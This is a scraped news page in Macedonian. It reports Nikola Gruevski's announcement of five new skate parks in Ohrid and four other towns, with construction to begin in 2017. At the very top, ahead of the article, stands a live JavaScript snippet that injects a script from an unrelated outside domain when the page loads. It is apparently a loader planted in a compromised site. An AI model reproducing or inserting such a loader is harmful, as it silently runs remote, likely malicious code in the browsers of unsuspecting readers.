;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Охрид ќе добие нов современ модерен скејт парк -

Охрид ќе добие нов современ модерен скејт парк

Во Охрид, Кавадарци, Штип, Тетово и Куманово ќе се градат современи и модерни скејт паркови за младите лица. Овој проект денеска го објави лидерот на ВМРО-ДПМНЕ Никола Груевски.

-Ќе се изградат пет нови паркови во кои младите кои се занимаваат со екстремни спортови ќе можат да развиваат вештини како врсниците во Европа и светот. Ќе има повеќе рампи и скокалници, а паркот ќе биде изработен од специјална подлога поради поголема безбедност и дрвена конструкција, изјави премиерот.

Агенцијата за млади и спорт во соработка со локалните самоуправи ќе започне со градба од 2017 година, по извршување на неопходните подготовки.

Leave a Reply

Your email address will not be published.